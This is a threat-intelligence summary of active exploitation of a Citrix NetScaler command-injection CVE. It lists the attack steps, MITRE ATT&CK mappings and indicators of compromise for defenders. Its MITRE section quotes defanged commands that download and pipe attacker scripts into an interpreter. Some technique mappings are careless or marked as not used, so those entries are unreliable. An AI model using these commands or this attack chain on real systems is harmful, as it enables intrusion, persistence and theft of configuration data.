Citrix NetScaler CVE-2026-88771: Observed Exploitation Artifacts and Hunt Indicators

Citrix NetScaler CVE-2026-88771: Observed Exploitation Artifacts and Hunt Indicators
LevelBlue THOR identified active exploitation of CVE-2026-88771 against Citrix NetScaler ADC and NetScaler Gateway, with attacker-controlled authentication data used to execute commands, retrieve payloads, and stage configuration data. The activity progressed to reverse-shell deployment, privileged account creation, and web-shell installation using infrastructure and artifacts including main.py, update_c08937.pl, and sec_monitor. #CVE-2026-88771 #CitrixNetScaler #main.py #update_c08937.pl #sec_monitor

Keypoints

  • CVE-2026-88771 is a critical pre-authentication command-injection vulnerability affecting Citrix NetScaler ADC and NetScaler Gateway.
  • THOR observed attacker-controlled NetScaler authentication events containing strings such as pitboss and NSPPE used to trigger exploitation.
  • Observed activity included command-execution testing, payload retrieval via curl and wget, and collection/staging of NetScaler configuration data.
  • Second-stage payload main.py overwrote /var/python/bin/customsnmpd to establish a reverse shell to 45.141.21[.]130:443.
  • Second-stage payload update_c08937.pl created the sec_monitor superuser account, changed /bin/sh permissions, and deployed a PHP web shell.
  • The Perl payload attempted to exfiltrate archived configuration data to 64.94.85[.]67:443 and then deleted artifacts to reduce traces.
  • Defenders should hunt for authentication-field command injection, access to /flash/nsconfig, web-directory file creation, and unusual network connections after exploitation attempts.

MITRE Techniques

  • [T1190 ] Exploit Public-Facing Application – The attackers exploited Citrix NetScaler via pre-authentication command injection in CVE-2026-88771 (‘attacker-controlled usernames designed to exploit CVE-2026-88771’).
  • [T1059.004 ] Command and Scripting Interpreter: Unix Shell – Shell commands were injected through authentication data to test execution and run tools like curl, wget, tar, and cat (‘whoami’, ‘curl’, ‘wget’, ‘tar’).
  • [T1105 ] Ingress Tool Transfer – Additional payloads were downloaded from remote infrastructure using curl and wget (‘curl hxxp://64.94.85[.]67:443/update_c08937.pl | perl’ and ‘wget hxxp://31.56.197[.]72:9090/lula’).
  • [T1005 ] Data from Local System – NetScaler configuration data was collected from /flash/nsconfig for staging and possible exfiltration (‘copy ns.conf’, ‘archive the entire /flash/nsconfig directory’).
  • [T1053.005 ] Scheduled Task/Job: Cron – The payload used persistence-like system modification by creating a privileged account and staging post-exploitation access (‘create a local account named sec_monitor’).
  • [T1098 ] Account Manipulation – The script created the sec_monitor account and assigned superuser privileges (‘creates a local account named sec_monitor and assigns it the superuser role’).
  • [T1543.003 ] Create or Modify System Process: Windows Service not applicable? – Not used.
  • [T1543.004 ] Create or Modify System Process: Launch Daemon – The payload modified /var/python/bin/customsnmpd to run attacker code and establish a reverse shell (‘overwriting the file with Python code designed to establish a reverse shell’).
  • [T1071.001 ] Application Layer Protocol: Web Protocols – The web shell was exposed through HTTP paths mimicking legitimate CSS resources (‘maps the web shell to URLs resembling legitimate NetScaler CSS resources’).
  • [T1055 ] Process Injection – Not evidenced in the article.
  • [T1106 ] Native API – The malicious Python and Perl scripts used direct system functionality to spawn shells and modify files (‘launching an interactive /bin/sh shell’).
  • [T1070.004 ] File Deletion – The payload removed its archive and deleted itself to reduce on-disk artifacts (‘removes the archive and deletes itself’).
  • [T1041 ] Exfiltration Over C2 Channel – The script attempted to upload the archived configuration to attacker infrastructure (‘attempts to upload the resulting archive to 64.94.85[.]67:443’).
  • [T1505.003 ] Server Software Component: Web Shell – A PHP web shell was deployed in the NetScaler web directory (‘deploys a PHP web shell at /var/netscaler/logon/LogonPoint/.local_journal’).
  • [T1027 ] Obfuscated Files or Information – The payload used randomized filename variations and CSS-like naming to disguise the web shell (‘randomized hexadecimal variations of the filename’).

Indicators of Compromise

  • [IPv4] Exploitation, payload hosting, reverse-shell C2, and exfiltration infrastructure – 70.172.58[.]168, 45.141.21[.]130, and other 7 IPs
  • [URL] Payload download, execution, and exfiltration endpoints – hxxp://23.27.143[.]20:9000/main.py, hxxp://64.94.85[.]67:443/update_c08937.pl, and other 3 URLs
  • [SHA-256] Payload hashes for identified second-stage scripts – e9fe43968c6c0955300e3bc4d7fb0b05a18570b4733aaf4f5c6f7f09be5a242c, 974b69782fdf5d67b97cfd508465939e44ee10798dbcc1e82b92d78776bad938
  • [File] Web shell and staged configuration artifacts in NetScaler directories – /var/netscaler/logon/LogonPoint/.local_journal, /var/netscaler/logon/insight-new.js, and other 2 files
  • [File] Temporary archive and staged exfiltration file – /tmp/update_result_3567cs.tgz, /var/netscaler/logon/LogonPoint/xua.html
  • [Account] Privileged account created by payload – sec_monitor


Read more: https://www.levelblue.com/blogs/spiderlabs-blog/citrix-netscaler-cve-2026-88771-observed-exploitation-artifacts-and-hunt-indicators